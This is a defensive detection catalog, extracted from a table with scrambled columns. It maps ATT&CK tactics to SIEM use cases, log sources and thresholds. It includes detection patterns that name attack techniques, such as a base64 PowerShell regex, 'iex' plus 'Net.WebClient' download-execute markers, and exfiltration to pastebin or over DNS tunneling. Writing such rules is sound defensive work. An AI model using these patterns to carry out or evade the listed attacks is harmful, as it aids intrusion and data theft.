ATT&CK Tactic ATT&CK Technique

Initial Access Hardware Additions

Initial Access Hardware Additions

Initial Access Hardware Additions

Initial Access Valid Accounts

Initial Access Valid Accounts

Initial Access Valid Accounts
Initial Access Valid Accounts
Initial Access Valid Accounts

Initial Access Valid Accounts

Exploit Public-Facing
Initial Access Application
Exploit Public-Facing
Initial Access Application
Exploit Public-Facing
Initial Access Application
Exploit Public-Facing
Initial Access Application
Exploit Public-Facing
Initial Access Application
Exploit Public-Facing
Initial Access Application
Spearphishing
Initial Access Attachment
Initial Access Spearphishing Link
Initial Access Drive-by Compromise
Initial Access Hardware Additions

Initial Access *
Initial Access *
 Exploit Public-Facing
Initial Access Application

Initial Access Hardware Additions

Initial Access Valid Accounts

Execution Local Job Scheduling

Execution Local Job Scheduling

Execution Local Job Scheduling

Execution Local Job Scheduling
Execution *

Execution *

Execution *

Execution *

Execution *

Execution *

Execution *

Execution *

Execution *
Execution *

Execution *

Execution PowerShell

Execution PowerShell

Execution PowerShell

Execution PowerShell

Execution PowerShell

Execution PowerShell

Execution PowerShell
Execution PowerShell

Execution *

Execution *
Exploitation for Client
Execution Execution
Exploitation for Client
Execution Execution

Execution *
Execution *

Execution *
Execution *
Persistence *
Persistence Valid Accounts
Persistence Valid Accounts
Persistence Valid Accounts
Persistence Valid Accounts
Persistence Valid Accounts

Persistence Create Account

Persistence Create Account

Persistence Valid Accounts

Privilege Escalation Valid Accounts

Privilege Escalation Valid Accounts

Privilege Escalation Valid Accounts

Privilege Escalation Valid Accounts
Privilege Escalation Valid Accounts
Privilege Escalation Valid Accounts

Privilege Escalation Valid Accounts

Privilege Escalation Valid Accounts

Privilege Escalation Startup Items
File System Permissions
Privilege Escalation Weakness

Defense Evasion File Deletion

Defense Evasion Modify Registry

Obfuscated Files or
Defense Evasion Information

Defense Evasion Process Doppelgänging

Defense Evasion Rootkit
Defense Evasion Install Root Certificate
Credential Access Network Sniffing

Credential Access Brute Force

Credential Access Kerberoasting

Credential Access Brute Force

Credential Access Brute Force
Credential Access Brute Force
Credential Access Brute Force
Credential Access Brute Force

Credential Access Brute Force

Credential Access Brute Force

Credential Access Brute Force
Discovery Account Discovery
File and Directory
Discovery Discovery
 File and Directory
Discovery Discovery

Discovery Network Service Scanning

Discovery Network Share Discovery

Discovery Network Share Discovery

File and Directory
Discovery Discovery

Lateral Movement *
Lateral Movement Valid Accounts

Lateral Movement Valid Accounts

Lateral Movement *

Lateral Movement Valid Accounts

Lateral Movement Valid Accounts

Lateral Movement Valid Accounts

Lateral Movement Pass the Hash

Data from Information
Collection Repositories

Exfiltration Over
Exfiltration Alternative Protocol

Exfiltration Data Encrypted

Exfiltration Over
Exfiltration Alternative Protocol
 Exfiltration Over
Exfiltration Alternative Protocol
Exfiltration Over
Command and Control
Exfiltration Channel
Exfiltration Over
Command and Control
Exfiltration Channel
Exfiltration Over
Command and Control
Exfiltration Channel

Exfiltration Over
Command and Control
Exfiltration Channel
Exfiltration Over
Exfiltration Alternative Protocol
Exfiltration Over
Command and Control
Exfiltration Channel
Exfiltration Over
Command and Control
Exfiltration Channel

Exfiltration Over
Exfiltration Alternative Protocol

Exfiltration Over
Exfiltration Alternative Protocol
Exfiltration Over
Exfiltration Alternative Protocol
Exfiltration Over
Command and Control
Exfiltration Channel

Exfiltration Over
Command and Control
Exfiltration Channel
Exfiltration Over
Command and Control
Exfiltration Channel
Exfiltration Over
Exfiltration Alternative Protocol
 Exfiltration Over
Command and Control
Exfiltration Channel

Exfiltration Over
Exfiltration Alternative Protocol

Command and Control Remote Access Tools

Command and Control Commonly Used Port

Command and Control *

Command and Control *

Command and Control *

Command and Control *

Command and Control *

Command and Control *

Command and Control *

Command and Control *

Command and Control *
Command and Control *
Command and Control *
Command and Control *

Command and Control *

Command and Control *

Command and Control *

Command and Control *

Command and Control *

Command and Control *

Command and Control *
Command and Control *
Command and Control *

Command and Control *

Command and Control *

Command and Control *

Command and Control *

Command and Control *

Persistence *

Command and Control Uncommonly Used Port

Use Case Name Threat

Unauthorized Device on Network Physical Access

Unique Organizational Unique Identifier (OUI) Physical Access

Unauthorized storage device Malware

Improbable Travel Account Compromise

Unauthorized IP access Account Compromise

Inactive User Account Account Compromise

Local Admin / Domain Admin Logon to workstation Account Compromise
User Logon Time Account Compromise

Local authentication Account Compromise

SQL Injection: URI/URL Length Web App Attacks

SQL Injection: URI Pattern Match Web App Attacks

SQL Injection: 500 HTTP Status Codes Web App Attacks

SQL Injection: IIS Command Execution Web App Attacks

Repeated Exploit Attempts Web App Attacks

New User Agent Web App Attacks

Suspicious Email Phishing

Internal Phishing Lateral Movement

Unique host file entry Malware
ARP Cache Poisoning Malware

Suspicious File Download Source Malware

Suspicious File Extension Downloaded Malware

SQL Injection Data Exfiltration

WAP connected to Wired Network Physical Access

Abnormal account usage Account Compromise

Scheduled Tasks Lateral Movement

Susipicious Scheduled Task Created Lateral Movement

Susipicious Scheduled Task Deleted Lateral Movement

Scheduled Tasks Lateral Movement

File Sandboxing Malware

Host-Base Intrusion Prevention System Malware

Recurring Malware Threat Malware

Recurring Malware Threat Loader Malware

Recurring Malware Threat Malware

Heuristic Malware Malware

Malware not blocked Malware

Malware blocked Malware

Malware PUP Malware

Ransomware upload Malware

Watering Hole Malware

Encoded PowerShell Malware

Non-Interactive PowerShell Malware

No Profile PowerShell Malware

Long PowerShell command Malware

PowerShell code download Malware

Known bad PowerShell commands Malware

New PowerShell cmdlet Malware

Unique PowerShell invokation Malware

New application install Malware

Blocked application install Malware

Worm Activity Lateral Movement

Worm Activity Lateral Movement

Hack Tools Lateral Movement

Suspicious Process Executed Lateral Movement

Remote Execution Lateral Movement

IDS detection Lateral Movement

Uncontrolled Change Malware
Run As Lateral Movement
Misnamed New User Accounts Account Compromise
Deactivated Account Account Compromise
Rapid Account Creation Account Compromise
Malicious Account Creation Account Compromise

Local User or Group Created Malware

Short-lived account Account Compromise

Unassociated Account Account Compromise

Password Hashes Account Compromise

Root Credential Exposure Account Compromise

Outdated Authentication Account Compromise

Kerberos Encryption Downgrade Account Compromise

Sensitive Security Groups Account Compromise

Sudo Access Denied Account Compromise

Unauthorized user to Azure Admin Group Account Compromise

Unauthorized Assigment of Delegate Mailbox Permissions Account Compromise

Unique Autoruns Malware

Take Ownership Data Compromise

Audit Log Cleared Covering Tracks

Registry Modification Lateral Movement

Timestamp Modification or Anomoly Covering Tracks

Unique Running Processes Malware

Rootkits Malware
Unique certificate added Malware
Promiscuous Mode Network Sniffing Physical Access

Password Exploit Tool Login Account Compromise

Kerberoasting / Domain Enumeration Account Compromise

Excessive Account Lockouts From Endpoint Account Compromise

Excessive User Account Lockouts Account Compromise

Brute Force Login Attempts Account Compromise
Anamalous Failed Logons Account Compromise
Service Account Failed Logons Account Compromise

Password Spraying Account Compromise

Invalid Service Account Logon Account Compromise

Remote Desktop Lateral Movement

Group auditing Lateral Movement

File Access Lateral Movement

Access Testing Account Compromise

Unknown Vulnerability Scanning Activity Vulnerability Scanning

Network Share Scan Reconnaissance

Permission Denied to Resource Reconnaissance

Cyber Deception Honey Token Accesed Data Compromise

Workstation to Workstation Communication Unauthorized Access

Successful Logon Multiple Devices Account Compromise

PSExec Pivoting Malware

Internal Device Blocked Lateral Movement

Service Account Compromise Account Compromise

Excessive Successful Logons Account Compromise

Unauthorized Executive Machine Access Account Compromise

Pass the Hash Lateral Movement

Unauthorized eDiscovery Action Account Compromise

Anomalous HTTP requests Denial of Service

Unauthorized Encryption Data Exfiltration

Anomalous File Transfer Data Exfiltration

"Naked" Hard Coded IP Malware

Large Outbound Transfer Data Exfiltration

Unbalanced bytes outbound Data Exfiltration

Anomalous network connections Data Exfiltration

Repeated bytes outbound Data Exfiltration

HTTP Data Exfiltration Data Exfiltration

Peer to Peer (P2P) Traffic Data Exfiltration

Unauthorized Proxy Data Exfiltration

DNS Tunneling Data Exfiltration

SMTP Tunneling Data Exfiltration

ICMP Tunneling Data Exfiltration

Cloud File Download Data Exfiltration

Outbound to Risky IP (C2) Data Exfiltration

BitTorrent Data Exfiltration

HTTP C2 Data Exfiltration

Data Loss Protection Data Compromise

Hidden File Transfer Data Compromise

Remote Administration Lateral Movement

Unauthorized Protocol Communication Malware

Anomalous connection Malware

Increased Connections Outbound Connections

Persistent Connections Outbound Connections

Fast Flux Outbound Connections

Beaconing Outbound Connections

Anonymization Service Outbound Connections

High-risk VPN Outbound Connections

High-risk IP Outbound Connections

New DNS Request Outbound Connections

WPAD DNS Request Outbound Connections
NTP DNS Request Outbound Connections
Update Server DNS Request Outbound Connections

Failed DNS Outbound Connections

Repetitive DNS Outbound Connections

External DNS Outbound Connections

DGA Outbound Connections

Fuzzy Domains Outbound Connections

Loopback DNS Command and Control

Teredo DNS Command and Control

Excessive GET requests Command and Control
Excessive POST requests Command and Control

Excessive 404 errors Command and Control

Variation of 200 status codes Command and Control

Self-Signed SSL Certificate Command and Control

Suspicious x509 SSL Certificate Command and Control

New Listening Port Malware

Malware Backdoor Malware

Unauthorized Port/Service/Protocol Vulnerability Exploit

Description Generic Tools
Switches,
Non-corporate device connected to corporate network
Routers
MAC address connected to network with Organizational Unique Identifier Switches,
(OUI) not seen before Routers

Endpoint
Protection,
Microsoft\
Windows\
Unauthorized USB/Disc/etc DriverFramewo
rks-UserMode
Transaction on
UDMF host
process

Cloud Mail,
Improbable distance between remote logins based on geo-IP VPN, VDI,
IDAM, NPS
Cloud Mail,
User logon from risky IP or a country where no business exists VPN, VDI,
IDAM, NPS
Active account with last accessed time > 30 days AD, OIM
Domain or local admin account logon directly to device Windows 4624
User logons between 1am and 4am local time Windows 4624
Windows 528,
Use of local authentication after machine is attached to domain
Unix secure log

Long URI/URL Length (> 250) Web Servers

URI Pattern Match (SELECT/DELETE/UPDATE) Web Servers

500 HTTP Status Codes Web Servers

IIS Command Execution IIS

Web Servers,
Repeated exploit attempts per application
WAF

User agent not seen before (whitelist) Web Servers

Email from IP address (not domain) or email with attachment from first-time
Mail
sender
Excessive emails sent from internal user/system Mail
Long tail analysis on local host file Custom script
New MAC address in ARP table Custom script
File download from high risk domain, wordpress site, root directory,
Proxy
hardcoded IP, or randomly generated domain
File downloaded with no extention or double extension Proxy
SQL SELECT injection Database

Network
Unauthorized wireless access point connected to the network
Scanner
Alert when users deviate from normal login behavior, such as time-of-day,
Windows 4624
workstation location and duration.
Unix crontab events Custom script
Windows
Suspicious scheduled task created
602/4698
Windows
Scheduled task quickly created then deleted
602/4698/4699
At.exe running on system (schedules commands to run) Windows 4688
Malicious file detected by Sandbox Sandbox Tool

HIDS alert HIDS

Endpoint
Multiple malware alerts on single machine; different malware
Protection
Endpoint
Multiple malware alerts on single machine; same malware
Protection
Endpoint
Multiple malware alerts on multiple machines; same malware
Protection
Endpoint
Heuristic malware detection
Protection
Endpoint
Malware not quarantined or deleted
Protection
Endpoint
Malware blocked on critical system
Protection
Endpoint
Potentially Unwanted Program
Protection
Ransomware infected file uploaded to cloud O365
Endpoint
Multiple infected devices in same site within 48 hours
Protection
Base64 encoded commands (“-enc”) or (?<base64_code>[A-Za-z0-9+/]{50,}[=] PowerShell
{0,2}) Transcription
PowerShell
“-NonI” – non-interactive; run command without showing prompt
Script Block
PowerShell
“-NoP” – no profile
Script Block
PowerShell
Long command line (>500)
Script Block
PowerShell
Execution of downloaded code (“iex” + “Net.WebClient”)
Script Block
PowerShell
Known bad commands – (wmi, dll, etc.)
Script Block
PowerShell
PowerShell cmdlet not seen before
Script Block
 PowerShell
PowerShell invoked outside of powershell (sysmon)
Script Block

Windows
First time application installed on any Hershey device AppLocker,
Windows 11707

Windows
Software installation blocked AppLocker,
Windows 11707

Excessive number of unique host/port connections from user device Netflow

Endpoint
Multiple infected devices in same subnet within 48 hours
Protection
Endpoint
Hack tool installed or run
Protection
Suspicious process executed on a critical host (certutil, etc.) Windows 4688
Endpoint
Use of Remote Execution Tool (RET)
Protection
IDS detecting an attack based on a known signature IDS
Configuration change from baseline MBSA
Windows events: runas Windows 4648
New user account created outside of naming convention Windows 4720
Monitor attempts to access deactivated accounts through audit logging. IDAM
Rapid account creation Windows 4720
Account created not by designated service account Windows 4720

Unix auth.log
groupadd/usera
dd/chfn,
New local user or group created
Windows
4720/4722/472
0

Windows 4720,
Account created and deleted within a day
4725, 4726

Account that cannot be associated with a business process or business owner IDAM

Access denied to passwd or shadow Unix secure log

Windows 4624,
Direct access to root user
Unix secure log

Windows 4642,
NTLM authentication to remote system (failed Kerberos)
4822, 4823

Kerberos Encryption Downgrade Custom script

 Windows
User added to sensitive local or global security group
4732/4728
User denied sudo access Unix secure log
User added to admin group in Azure AD by a user not authorized to make
Azure
changes
User assigned delegate mailbox permissions by a user who is unauthorized to
Mail
grant such privileges
Long tail analysis on autoruns Autoruns

User running dangerous "Take Ownership" action Windows 4670

Windows
Windows security log cleared 517/1104/104//
1102
WinRegMon,
Modification of critical registry keys/values in HKLM/HKLU
Windows 4657

Incoming logs from previous day or future time ALL

Microsoft
Long tail analysis on processes
Sysmon
Change to OS binaries outside of patches FIM
Long tail analysis on local certificate store Custom script
Empty result in CAM table indicates device listening in promiscuous mode Switches

Logon attempt using password exploit tool. Some tools leave artificats that can Windows
indicate misuse of authentication. Detect by matching the random regex 4625/4624

Excessive Kerberos service tickets requested Windows 4769

Excessive Account Lockouts From Endpoint Windows 4740

Excessive User Account Lockouts Windows 4740

Excessive failed logons Windows 4625
Z-Score deviation from baseline failed logons/day IDAM
Excessive failed logons from service account IDAM

Failed logons from multiple accounts on same device. Single IP address

attempting more than 1 unique username on a non-domain controller (5+) or IDAM
domain controller (20+) within 3 minutes

Service account logon to non-service related system (vuln scanner account

authenticating from non vuln scanner). Look for service accounts Windows 4624
authenticating from workstations.
Failed Remote Desktop logon attempts Windows 4825
Reading member information from sensitive AD group Windows 4662
Windows 4663,
Failed Attempt to Access a File Share
5145
Excessive authentication attempts against multiple file shares Windows 4663

Endpoint
Protection,
Internal or External vulnerability scanning from unknown source
Firewall, IDS,
IPS

Multiple network share access attempts from internal host Windows 5140

Microsoft
Permission denied when attempting to access network resource
Sysmon
Endpoint
Honey Token Accessed or Used
Protection

Network communication directly between workstations Netflow

Non-technical user logged onto multiple machines within 24 hours Windows 4624
Windows
PSExec from new source or to new destination 7045/4697/514
0

Endpoint
Protection,
Blocked traffic from internal device
Firewall, IDS,
IPS

Unix secure log,

Direct SSH logon/Interactive logon using service account credentials
Windows 4624

Excessive sucessful logons from non-service account IDAM

Logon to executive machine from a non-executive account Windows 4624

Logon event not from network domain, Entropy in source workstation name Windows 4624

eDiscovery action taken by user not authorized to interact with eDiscovery Mail

Anomalous number of HTTP requests by http method Web Servers

Packet
Unauthorized Use of Encryption (not decryptable by inspection tools)
Inspection tools

File transport over uncommon protocol Proxy, Firewall

Direct IP calls to internet via DNS or HTTP (can filter out trusted ASN’s using
Proxy
domain_stats.py whois lookup OR use ASN lookup table)

Proxy, Firewall,
Large outbound transfer
Netflow, IDS

Proxy, Firewall,
More bytes uploaded than downloaded from source over 24 hours
Netflow, IDS

Anomalous network connections between devices on the same subnet (1 out Proxy, Firewall,
of 15 HR systems spikes in bytes uploaded) Netflow, IDS

Repeated bytes out IDS, Firewall

HTTP PUT or POST to non-approved site, threat domain, hardcoded IP, Proxy, Firewall,
pastebin IDS

Peer to Peer (P2P) traffic detected IDS, Firewall

XFF traffic from unauthorized proxy IDS

Variance of DNS traffic volume from host

TXT/CNAME/MX records from abnormal host
Variance in DNS request length
DNS
Variability in frequency of requests
Randomness in domain names
Variance in volume of NXDOMAIN requests

Exfil over SMTP (SMTP traffic NOT sent to Microsoft) IDS, Firewall

Exfil over ICMP (abnormal ICMP size / lengthy ICMP session) IDS, Firewall

Excessive file downloads from cloud storage Mail

Proxy, Firewall,
Outbound connection to bad domain, IP (C2) or non-business country
IDS

Proxy, Firewall,
Outbound BitTorrent traffic
IDS

Proxy, Firewall,
Excessive volume of HTTP POST commands
IDS
Data Loss Protection alerts reviewed DLP

Outbound file transfer on unrelated port that is commonly allowed through

oubound ACLs. File transfer using ftp/ssh/sftp/tftp/telnet/ftps, but not using Firewall, IDS
port 20,21,22,23,69,115,990,989.

Endpoint
Protection,
Unauthorized remote admin tools (VNC)
Microsoft
AppLocker
Protocol communication to unauthorized server (DNS, NTP, SQL traffic to
Netflow
devices that don’t host the service)
Proxy, Firewall,
Z-score deviation from #, length, or volume of network connections
IDS
Spike in number of destination IP network connections by source IP Netflow

Persistent connections (>4 hours) not including VPN, backup, screen share, etc. Netflow

DNS query for new domain (last 3 months) excluding Alexa TOP 1M DNS

IDS, Firewall,
DNS, RITA,
Beaconing system
persistent.pl,
Flare
Proxy, Firewall,
Usage of anonymization services (TOR, etc.)
IDS, DNS
VPN logins from suspicious locations VPN
Proxy, Firewall,
Communication with external IP/service on threat list
IDS, Netflow
DNS request for domain not previously requested (dynamic whitelist) DNS
DNS resolution for unauthorized WPAD proxy (wpad.*) DNS
DNS resolution for unauthorized NTP server (time.*, ntp.*) DNS
DNS resolution for unauthorized windows update server (not SCCM) DNS

Excessive failed DNS queries DNS

Repetitive DNS Calls with TTLs < 300, answers with reply record count > 12,
DNS
persistent callbacks

DNS query to external DNS server (non-Infoblox DNS traffic) IDS, Firewall
 Proxy, DNS,
Communication with Dynamically Generated Domain (high entropy) Netflow, IDS,
freq.py
Communication to/from domain similar to company brand (her5heys.com) via DNS, Proxy,
DNS, HTTP, Email Netflow, IDS

DNS reponses to loopback, RFC 1918 space/bogon space DNS

Teredo IPv6 DNS query DNS

400+ GET requests per minute by source Proxy
200+ POST requests per minute by source Proxy
Web Servers,
10+ 404 errors per 30 minutes by source Proxy, IDS,
Firewall
Web Servers,
Standard deviation in 200 status codes Proxy, IDS,
Firewall
Self-signed SSL certificate Proxy, IDS

Missing fields (country, organization, OU, location)

New issuer (build baseline)
Valid for more than 1096 days Proxy, IDS,
Odd fields (from invalid US state, invalid country, common name missing freq.py
period)
High entropy common name (freq.py)

Network
New port listening on device
Scanner
Service account starting unique process Windows 4688

Windows 7045,
Netflow,
Unauthorized port, service, or protocol detected on a system. Long-tail Network
analysis. Be more suspicious of new services on workstations Scanner,
Microsoft
sysmon